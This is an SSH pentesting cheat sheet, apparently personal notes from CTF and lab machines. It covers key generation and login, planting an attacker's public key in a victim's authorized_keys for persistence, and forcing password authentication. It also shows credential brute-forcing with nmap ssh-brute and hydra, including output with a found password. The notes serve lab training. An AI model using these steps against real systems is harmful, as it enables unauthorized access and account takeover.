SSH (22)

Service

service ssh start
#Verification
netstat -antp | grep sshd

Keys

SSH Connection

chmod 600 id_rsa
ssh -i id_rsa user@host -p port

Generate Keys

0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa                                                                   
Generating public/private rsa key pair.                                                                        
Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa):                                               
Enter passphrase (empty for no passphrase):                                                                    
Enter same passphrase again:                                                                                   
Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa.                                               
Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub.                                               
The key fingerprint is:                                                                                        
SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell                                     
The key's randomart image is:                                                                                  
+---[RSA 2048]----+                                                                                            
|        .o.    E=|                                                                                            
|       ..  . + .o|                                                                                            
|      o o   o +  |                                                                                            
|     . o + . ....|                                                                                            
|      . S . + ++*|                                                                                            
|       = . = .o**|                                                                                            
|        O + o  ++|                                                                                            
|       . B =  =  |                                                                                            
|          +.==.o |                                                                                            
+----[SHA256]-----+                                                                                            
0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh                                                               
0xSs0rZ@pico-2018-shell:~/.ssh$                                                                                
0xSs0rZ@pico-2018-shell:~/.ssh$  ls                                                                            
id_rsa  id_rsa.pub                                                                                             
0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys                                           
0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost                                                
The authenticity of host 'localhost (127.0.0.1)' can't be established.                                         
ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU.                                   
Are you sure you want to continue connecting (yes/no)? yes                                                     
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.                                     
picoCTF{quelquechose}

Authorized-Keys

# Atacker
root@Host-001:~/Bureau/htb# cat traceback.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001
root@Host-001:~/Bureau/htb#

# Victim
webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys
<UvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys
webadmin@traceback:/home/webadmin/.ssh$ 

# Connection
root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181

Pseudo-Terminal

ssh -t bandit18@localhost /bin/sh

SSL Encryption

echo pass | openssl s_client -quiet -connect localhost:30001

Generate key

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/home/parrot/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

Your identification has been saved in /home/parrot/.ssh/id_rsa
Our public key has been saved in /home/parrot/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:...SNIP... parrot@parrot
The key's randomart image is:
+---[RSA 3072]----+
|            o..  |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|       + +oo+o   |
+----[SHA256]-----+

SSH with a key id_rsa

[Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa              
[Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195

Metasploit

Dangerous settings

SSH Audit

$ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
$ ./ssh-audit.py 10.129.14.132

Change Authentication Method

$ ssh -v cry0l1t3@10.129.14.132

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config 
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

For potential brute-force attacks, we can specify the authentication method with the SSH client option PreferredAuthentications.

$ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password

cry0l1t3@10.129.14.132's password:

Bruteforce

Nmap

[Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:

Hydra - See Brute force - SSH

$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197   login: user   password: password
1 of 1 target successfully completed, 1 valid password found

SSH on Windows

Binaries:

Install SSH on Windows:

Execute command - Windows

PreviousSQLiteNextWinRM (5985, 5986)

Last updated